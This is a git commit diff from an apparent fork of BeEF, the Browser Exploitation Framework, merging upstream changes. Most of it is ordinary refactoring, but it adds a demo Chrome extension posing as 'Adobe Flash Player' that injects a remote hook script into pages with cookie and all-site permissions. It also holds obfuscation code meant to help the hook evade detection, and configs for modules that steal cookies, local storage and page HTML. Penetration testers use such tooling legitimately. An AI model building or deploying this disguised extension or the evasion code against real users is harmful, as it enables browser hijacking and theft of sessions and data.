Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge remote branch 'upstream/master'

Browse Source
This commit is contained in:
root
2012-06-08 08:30:35 +02:00
parent ac258f654d 99c6a819f3
commit 27ed3ac2da
82 changed files with 2054 additions and 123 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
README.mkd
View File

@@ -72,13 +72,13 @@ __The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
$ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
Usage
-----
To get started, simply execute beef and follow the instrustions:
To get started, simply execute beef and follow the instructions:
$ ./beef
$ ./beef

11
beef
View File

@@ -59,6 +59,15 @@ if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
BeEF::Core::Console::Banners.print_ascii_art
end
# @note Check if port and WebSocket port need to be updated from command line parameters
unless BeEF::Core::Console::CommandLine.parse[:port].empty?
config.set('beef.http.port', BeEF::Core::Console::CommandLine.parse[:port])
end
unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty?
config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port])
end
# @note Prints BeEF welcome message
BeEF::Core::Console::Banners.print_welcome_msg
@@ -115,7 +124,7 @@ print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
#@note Starts the WebSocket server
if config.get("beef.http.websocket.enable")
BeEF::Core::Websocket::Websocket.instance
print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port")}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
end

15
core/filters/browser.rb
View File

@@ -78,10 +78,10 @@ module Filters
true
end
# Verify the screen params are valid
# Verify the screen size is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid screen param characters
def self.is_valid_screen_params?(str)
# @return [Boolean] If the string has valid screen size characters
def self.is_valid_screen_size?(str)
return false if has_non_printable_char?(str)
return false if str.length > 200
true
@@ -105,6 +105,15 @@ module Filters
true
end
# Verify the date stamp is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid date stamp characters
def self.is_valid_date_stamp?(str)
return false if has_non_printable_char?(str)
return false if str.length > 200
true
end
# Verify the browser_plugins string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser plugin characters

24
core/main/client/browser.js
View File

@@ -166,10 +166,18 @@ beef.browser = {
/**
* Returns true if FF12
* @example: beef.browser.isFF12()
* @example: beef.browser.isFF12()
*/
isFF12: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
},
/**
* Returns true if FF13
* @example: beef.browser.isFF13()
*/
isFF13: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null;
},
/**
@@ -177,7 +185,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
* @example: beef.browser.isFF()
*/
isFF: function() {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13();
},
/**
@@ -411,6 +419,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
FF10: this.isFF10(), // Firefox 10
FF11: this.isFF11(), // Firefox 11
FF12: this.isFF12(), // Firefox 12
FF13: this.isFF13(), // Firefox 13
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
@@ -468,6 +477,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
if (this.isFF10()) { return '10' }; // Firefox 10
if (this.isFF11()) { return '11' }; // Firefox 11
if (this.isFF12()) { return '12' }; // Firefox 12
if (this.isFF13()) { return '13' }; // Firefox 13
if (this.isIE6()) { return '6' }; // Internet Explorer 6
if (this.isIE7()) { return '7' }; // Internet Explorer 7
@@ -704,7 +714,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
/**
* Returns zombie screen size and color depth.
*/
getScreenParams: function() {
getScreenSize: function() {
return {
width: window.screen.width,
height: window.screen.height,
@@ -753,10 +763,11 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
var hostname = document.location.hostname;
var hostport = (document.location.port)? document.location.port : "80";
var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString();
var os_name = beef.os.getName();
var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
var screen_params = beef.browser.getScreenParams();
var screen_size = beef.browser.getScreenSize();
var window_size = beef.browser.getWindowSize();
var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
@@ -778,9 +789,10 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
if(hostport) details["HostPort"] = hostport;
if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
if(os_name) details['OsName'] = os_name;
if(date_stamp) details['DateStamp'] = date_stamp;
if(system_platform) details['SystemPlatform'] = system_platform;
if(browser_type) details['BrowserType'] = browser_type;
if(screen_params) details['ScreenParams'] = screen_params;
if(screen_size) details['ScreenSize'] = screen_size;
if(window_size) details['WindowSize'] = window_size;
if(java_enabled) details['JavaEnabled'] = java_enabled;
if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled

4
core/main/client/browser/popup.js
View File

@@ -25,7 +25,7 @@ beef.browser.popup = {
blocker_enbabled: function ()
{
screenParams = beef.browser.getScreenParams();
screenParams = beef.browser.getScreenSize();
var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
if (popUp == null || typeof(popUp)=='undefined') {
return true;
@@ -36,4 +36,4 @@ beef.browser.popup = {
}
};
beef.regCmp('beef.browser.popup');
beef.regCmp('beef.browser.popup');

4
core/main/client/mitb.js
View File

@@ -177,7 +177,7 @@ beef.mitb = {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
};
y.send(query);
beef.mitb.sniff("POST: " + url + "[" + query + "]");
return true;
@@ -227,7 +227,7 @@ beef.mitb = {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
};
y.send(null);
beef.mitb.sniff("GET: " + url);

11
core/main/console/commandline.rb
View File

@@ -26,6 +26,9 @@ module BeEF
@options[:resetdb] = false
@options[:ascii_art] = false
@options[:ext_config] = ""
@options[:port] = ""
@options[:ws_port] = ""
@already_parsed = false
@@ -53,6 +56,14 @@ module BeEF
opts.on('-c', '--config FILE', 'Load a different configuration file: if it\'s called custom-config.yaml, git automatically ignores it.') do |f|
@options[:ext_config] = f
end
opts.on('-p', '--port PORT', 'Change the default BeEF listening port') do |p|
@options[:port] = p
end
opts.on('-w', '--wsport WS_PORT', 'Change the default BeEF WebSocket listening port') do |ws_port|
@options[:ws_port] = ws_port
end
end
optparse.parse!

16
core/main/handlers/browserdetails.rb
View File

@@ -118,6 +118,14 @@ module BeEF
self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
end
# get and store the date
date_stamp = get_param(@data['results'], 'DateStamp')
if BeEF::Filters.is_valid_date_stamp?(date_stamp)
BD.set(session_id, 'DateStamp', date_stamp)
else
self.err_msg "Invalid date returned from the hook browser's initial connection."
end
# get and store page title
page_title = get_param(@data['results'], 'PageTitle')
if BeEF::Filters.is_valid_pagetitle?(page_title)
@@ -175,11 +183,11 @@ module BeEF
end
# get and store the zombie screen size and color depth
screen_params = get_param(@data['results'], 'ScreenParams')
if BeEF::Filters.is_valid_screen_params?(screen_params)
BD.set(session_id, 'ScreenParams', screen_params)
screen_size = get_param(@data['results'], 'ScreenSize')
if BeEF::Filters.is_valid_screen_size?(screen_size)
BD.set(session_id, 'ScreenSize', screen_size)
else
self.err_msg "Invalid screen params returned from the hook browser's initial connection."
self.err_msg "Invalid screen size returned from the hook browser's initial connection."
end
# get and store the window size

2
core/main/handlers/modules/beefjs.rb
View File

@@ -77,7 +77,7 @@ module Modules
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@hook = evasion.obfuscate(@hook)
@hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
end
@body << @hook

42
core/main/handlers/modules/command.rb
View File

@@ -50,26 +50,34 @@ module BeEF
build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
ws = BeEF::Core::Websocket::Websocket.instance
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@output = evasion.obfuscate(command_module.output)
else
@output = command_module.output
end
#todo antisnatchor: remove this gsub crap adding some hook packing.
if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
content = command_module.output.gsub('//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//', "")
ws.send(content, hooked_browser.session)
#content = command_module.output.gsub('//
#// Copyright 2012 Wade Alcorn wade@bindshell.net
#//
#// Licensed under the Apache License, Version 2.0 (the "License");
#// you may not use this file except in compliance with the License.
#// You may obtain a copy of the License at
#//
#// http://www.apache.org/licenses/LICENSE-2.0
#//
#// Unless required by applicable law or agreed to in writing, software
#// distributed under the License is distributed on an "AS IS" BASIS,
#// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#// See the License for the specific language governing permissions and
#// limitations under the License.
#//', "")
ws.send(@output, hooked_browser.session)
else
@body << command_module.output + "\n\n"
@body << @output + "\n\n"
end
# @note prints the event to the console
if BeEF::Settings.console?

39
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -119,21 +119,36 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the date stamp
date_stamp = BD.get(zombie_session, 'DateStamp')
if not date_stamp.nil?
encoded_date_stamp = CGI.escapeHTML(date_stamp)
encoded_date_stamp_hash = { 'Date' => encoded_date_stamp }
page_name_row = {
'category' => 'Host',
'data' => encoded_date_stamp_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the os name
os_name = BD.get(zombie_session, 'OsName')
if not host_name.nil?
encoded_os_name = CGI.escapeHTML(os_name)
encoded_os_name_hash = { 'OS Name' => encoded_os_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_os_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the browser name
browser_name = BD.get(zombie_session, 'BrowserName')
if not browser_name.nil?
@@ -224,24 +239,24 @@ class Modules < BeEF::Extension::AdminUI::HttpController
end
# set and add the zombie screen size and color depth
screen_params = BD.get(zombie_session, 'ScreenParams')
if not screen_params.nil?
screen_size = BD.get(zombie_session, 'ScreenSize')
if not screen_size.nil?
screen_params_hash = JSON.parse(screen_params.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_params_hash['width']
screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width']
(print_error "width is wrong type";return) if not width.is_a?(Fixnum)
height = screen_params_hash['height']
height = screen_size_hash['height']
(print_error "height is wrong type";return) if not height.is_a?(Fixnum)
colordepth = screen_params_hash['colordepth']
colordepth = screen_size_hash['colordepth']
(print_error "colordepth is wrong type";return) if not colordepth.is_a?(Fixnum)
# construct the string to be displayed in the details tab
encoded_screen_params = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
encoded_screen_params_hash = { 'Screen Params' => encoded_screen_params }
encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size }
page_name_row = {
'category' => 'Host',
'data' => encoded_screen_params_hash,
'data' => encoded_screen_size_hash,
'from' => 'Initialization'
}

39
extensions/console/lib/shellinterface.rb
View File

@@ -328,21 +328,36 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the date
date_stamp = BD.get(self.targetsession, 'DateStamp')
if not date_stamp.nil?
encoded_date_stamp = CGI.escapeHTML(date_stamp)
encoded_date_stamp_hash = { 'Date' => encoded_date_stamp }
page_name_row = {
'category' => 'Host',
'data' => encoded_date_stamp,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the os name
os_name = BD.get(self.targetsession, 'OsName')
if not os_name.nil?
encoded_os_name = CGI.escapeHTML(os_name)
encoded_os_name_hash = { 'OS Name' => encoded_os_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_os_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the browser name
browser_name = BD.get(self.targetsession, 'BrowserName')
if not browser_name.nil?
@@ -433,21 +448,21 @@ class ShellInterface
end
# set and add the zombie screen size and color depth
screen_params = BD.get(self.targetsession, 'ScreenParams')
if not screen_params.nil?
screen_size = BD.get(self.targetsession, 'ScreenSize')
if not screen_size.nil?
screen_params_hash = JSON.parse(screen_params.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_params_hash['width']
height = screen_params_hash['height']
colordepth = screen_params_hash['colordepth']
screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width']
height = screen_size_hash['height']
colordepth = screen_size_hash['colordepth']
# construct the string to be displayed in the details tab
encoded_screen_params = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
encoded_screen_params_hash = { 'Screen Params' => encoded_screen_params }
encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size }
page_name_row = {
'category' => 'Host',
'data' => encoded_screen_params_hash,
'data' => encoded_screen_size_hash,
'from' => 'Initialization'
}

4
extensions/demos/flash_update_chrome_extension/background.js Normal file
View File

@@ -0,0 +1,4 @@
d=document;
e=d.createElement('script');
e.src="http://127.0.0.1:3000/hook.js";
d.body.appendChild(e);

BIN
extensions/demos/flash_update_chrome_extension/icon128.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 11 KiB

BIN
extensions/demos/flash_update_chrome_extension/icon16.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.6 KiB

BIN
extensions/demos/flash_update_chrome_extension/icon48.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 3.6 KiB

26
extensions/demos/flash_update_chrome_extension/manifest.json Normal file
View File

@@ -0,0 +1,26 @@
{
// Simple chrome extension
// Just loads beef into the extension context.
//
// You may need to set the IP address of the beef hook in background.js
// Then you can pack the extension (from within the chrome extensions page) and add the crx file to extensions/demos/html/
"name": "Adobe Flash Player",
"version": "11.2.202.235",
"description": "Introduces vulnerabilites into web browsers",
"background": {
"scripts": ["background.js"]
},
"icons": {
"16": "icon16.png",
"48": "icon48.png",
"128": "icon128.png"
},
"permissions": [
"tabs",
"http://*/*",
"https://*/*",
"file://*/*",
"cookies"
]
}

BIN
extensions/demos/html/adobe_flash_update.crx Normal file
View File

Binary file not shown.

BIN
extensions/demos/html/adobe_flash_update.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 47 KiB

4
extensions/demos/html/clickjack.html Normal file
View File

@@ -0,0 +1,4 @@
<p>&nbsp;</p>
<a href="#" onclick="javascript:alert('You clicked a link at '+window.location);">moooooooo</a>
<p>&nbsp;</p>

6
extensions/evasion/config.yaml
View File

@@ -20,5 +20,9 @@ beef:
name: 'Evasion'
authors: ["antisnatchor"]
scramble_variables: true
to_scramble: ["beef", "Beef"]
scramble_cookies: true
scramble:
beef: "beef"
Beef: "Beef"
evercookie: "evercookie"
chain: ["scramble","minify","base_64"]

23
extensions/evasion/evasion.rb
View File

@@ -29,6 +29,26 @@ module BeEF
@input = apply_chain(input, @@techniques)
end
def add_bootstrapper
@bootstrap = ''
# add stuff at the end, only once (when serving the initial init javascript)
@@techniques.each do |technique|
#1. get the ruby module inside the obfuscation directory: the file name will be the same of the string used in "chain"
#2. call the "execute" method of the ruby module, passing the input
#3. update the input in order that next technique will work on the pre-processed input.
if File.exists?("#{$root_dir}/extensions/evasion/obfuscation/#{technique}.rb")
print_debug "[OBFUSCATION] Applying technique [#{technique}]"
klass = BeEF::Extension::Evasion.const_get(technique.capitalize).instance
is_bootstrap_needed = klass.need_bootstrap
if is_bootstrap_needed
@bootstrap += klass.get_bootstrap
end
end
@bootstrap
end
@bootstrap
end
def apply_chain(input, techniques)
@output = input
techniques.each do |technique|
@@ -37,8 +57,7 @@ module BeEF
#3. update the input in order that next technique will work on the pre-processed input.
if File.exists?("#{$root_dir}/extensions/evasion/obfuscation/#{technique}.rb")
print_debug "[OBFUSCATION] Applying technique [#{technique}]"
klass = BeEF::Extension::Evasion.const_get(technique.capitalize)
klass = klass.instance
klass = BeEF::Extension::Evasion.const_get(technique.capitalize).instance
@output = klass.execute(@output, @@config)
end
@output

1
extensions/evasion/extension.rb
View File

@@ -26,6 +26,7 @@ end
end
require 'extensions/evasion/evasion'
require 'extensions/evasion/helper'
require 'extensions/evasion/obfuscation/scramble'
require 'extensions/evasion/obfuscation/minify'
require 'extensions/evasion/obfuscation/base_64'

33
extensions/evasion/helper.rb Normal file
View File

@@ -0,0 +1,33 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Evasion
# Common methods used by multiple obfuscation techniques
module Helper
def self.random_string(length=5)
chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ'
result = ''
length.times { result << chars[rand(chars.size)] }
result
end
end
end
end
end

17
extensions/evasion/obfuscation/base_64.rb
View File

@@ -19,19 +19,20 @@ module BeEF
class Base_64
include Singleton
def random_string(length=5)
chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ'
result = ''
length.times { result << chars[rand(chars.size)] }
result
def need_bootstrap
true
end
def get_bootstrap
# the decode function is obfuscated, and it's called "dec" (see below in "execute", where it is used)
decode_function = 'var _0x33db=["\x61\x74\x6F\x62","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68","\x6A\x6F\x69\x6E"];function dec(_0x487fx2){if(window[_0x33db[0]]){return atob(_0x487fx2);} ;var _0x487fx3=_0x33db[1];var _0x487fx4,_0x487fx5,_0x487fx6,_0x487fx7,_0x487fx8,_0x487fx9,_0x487fxa,_0x487fxb,_0x487fxc=0,_0x487fxd=0,dec=_0x33db[2],_0x487fxe=[];if(!_0x487fx2){return _0x487fx2;} ;_0x487fx2+=_0x33db[2];do{_0x487fx7=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx8=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx9=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxa=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxb=_0x487fx7<<18|_0x487fx8<<12|_0x487fx9<<6|_0x487fxa;_0x487fx4=_0x487fxb>>16&0xff;_0x487fx5=_0x487fxb>>8&0xff;_0x487fx6=_0x487fxb&0xff;if(_0x487fx9==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4);} else {if(_0x487fxa==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5);} else {_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5,_0x487fx6);} ;} ;} while(_0x487fxc<_0x487fx2[_0x33db[6]]);;dec=_0x487fxe[_0x33db[7]](_0x33db[2]);return dec;};'
end
def execute(input, config)
encoded = Base64.strict_encode64(input)
# basically, use atob if supported otherwise a normal base64 JS implementation (ie.: IE :-)
decode_function = 'var _0x33db=["\x61\x74\x6F\x62","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68","\x6A\x6F\x69\x6E"];function dec(_0x487fx2){if(window[_0x33db[0]]){return atob(_0x487fx2);} ;var _0x487fx3=_0x33db[1];var _0x487fx4,_0x487fx5,_0x487fx6,_0x487fx7,_0x487fx8,_0x487fx9,_0x487fxa,_0x487fxb,_0x487fxc=0,_0x487fxd=0,dec=_0x33db[2],_0x487fxe=[];if(!_0x487fx2){return _0x487fx2;} ;_0x487fx2+=_0x33db[2];do{_0x487fx7=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx8=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx9=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxa=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxb=_0x487fx7<<18|_0x487fx8<<12|_0x487fx9<<6|_0x487fxa;_0x487fx4=_0x487fxb>>16&0xff;_0x487fx5=_0x487fxb>>8&0xff;_0x487fx6=_0x487fxb&0xff;if(_0x487fx9==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4);} else {if(_0x487fxa==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5);} else {_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5,_0x487fx6);} ;} ;} while(_0x487fxc<_0x487fx2[_0x33db[6]]);;dec=_0x487fxe[_0x33db[7]](_0x33db[2]);return dec;};'
var_name = random_string(3)
input = "var #{var_name}=\"#{encoded}\";#{decode_function}[].constructor.constructor(dec(#{var_name}))();"
var_name = BeEF::Extension::Evasion::Helper::random_string(3)
input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(dec(#{var_name}))();"
print_debug "[OBFUSCATION - BASE64] Javascript has been base64'ed'"
input
end

5
extensions/evasion/obfuscation/minify.rb
View File

@@ -19,6 +19,11 @@ module BeEF
require 'jsmin'
class Minify
include Singleton
def need_bootstrap
false
end
def execute(input, config)
input = JSMin.minify(input)
print_debug "[OBFUSCATION - MINIFIER] Javascript has been minified"

48
extensions/evasion/obfuscation/scramble.rb
View File

@@ -19,28 +19,44 @@ module BeEF
class Scramble
include Singleton
def random_string(length=5)
chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ'
result = ''
length.times { result << chars[rand(chars.size)] }
result
def need_bootstrap
false
end
def execute(input, config)
to_scramble = config.get('beef.extension.evasion.to_scramble')
to_scramble.each do |var|
mod_var = random_string
input = input.gsub!(var,random_string)
print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{mod_var}]"
@output = input
#todo: add scrambled vars to an Hash.
#todo: even better. Add them to the Configuration object, like "beef" => "cnjD3"
#@@to_scramble = config.get('beef.http.evasion.scramble_variables')
#@@scrambled = Hash.new
to_scramble = config.get('beef.extension.evasion.scramble')
to_scramble.each do |var, value|
if var == value
# Variables have not been scrambled yet
mod_var = BeEF::Extension::Evasion::Helper::random_string(3)
@output.gsub!(var,mod_var)
config.set("beef.extension.evasion.scramble.#{var}",mod_var)
print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{mod_var}]"
else
# Variables already scrambled, re-use the one already created to maintain consistency
@output.gsub!(var,value)
print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{value}]"
end
@output
end
input
end
if config.get('beef.extension.evasion.scramble_cookies')
# ideally this should not be static, but it's static in JS code, so fine for nowend
mod_cookie = BeEF::Extension::Evasion::Helper::random_string(5)
if config.get('beef.http.hook_session_name') == "BEEFHOOK"
@output.gsub!("BEEFHOOK",mod_cookie)
config.set('beef.http.hook_session_name',mod_cookie)
print_debug "[OBFUSCATION - SCRAMBLER] cookie [BEEFHOOK] scrambled -> [#{mod_cookie}]"
else
@output.gsub!("BEEFHOOK",config.get('beef.http.hook_session_name'))
print_debug "[OBFUSCATION - SCRAMBLER] cookie [BEEFHOOK] scrambled -> [#{config.get('beef.http.hook_session_name')}]"
end
end
@output
end
end
end
end

1
install-beef
View File

@@ -1,3 +1,4 @@
#!/bin/bash
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#

4
modules/browser/get_visited_domains/config.yaml
View File

@@ -22,5 +22,5 @@ beef:
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
working: ["FF","IE"]
not_working: ["O","C","S"]
working: ["FF", "IE"]
not_working: ["O", "C", "S"]

4
modules/browser/hooked_domain/ajax_fingerprint/config.yaml
View File

@@ -17,11 +17,11 @@ beef:
module:
ajax_fingerprint:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Fingerprint Ajax"
description: "Fingerprint Ajax and JS libraries present on the hooked page."
authors: ["qswain"]
target:
working: ["FF","S"]
working: ["FF", "S"]
not_working: ["C"]

2
modules/browser/hooked_domain/alert_dialog/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
alert_dialog:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Create Alert Dialog"
description: "Sends an alert dialog to the hooked browser."
authors: ["wade", "bm"]

2
modules/browser/hooked_domain/deface_web_page/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
deface_web_page:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace Content (Deface)"
description: "Overwrite the page, title and shortcut icon on the hooked page."
authors: ["antisnatchor"]

2
modules/browser/hooked_domain/get_cookie/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_cookie:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Cookie"
description: "This module will retrieve the session cookie from the current page."
authors: ["bcoles"]

2
modules/browser/hooked_domain/get_local_storage/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_local_storage:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Local Storage"
description: "Extracts data from the HTML5 localStorage object."
authors: ["bcoles"]

2
modules/browser/hooked_domain/get_page_html/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_page_html:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Page HTML"
description: "This module will retrieve the HTML from the current page."
authors: ["bcoles"]

2
modules/browser/hooked_domain/get_page_links/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_page_links:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Page HREFs"
description: "This module will retrieve HREFs from the target page."
authors: ["vo"]

2
modules/browser/hooked_domain/get_session_storage/config.yaml
View File

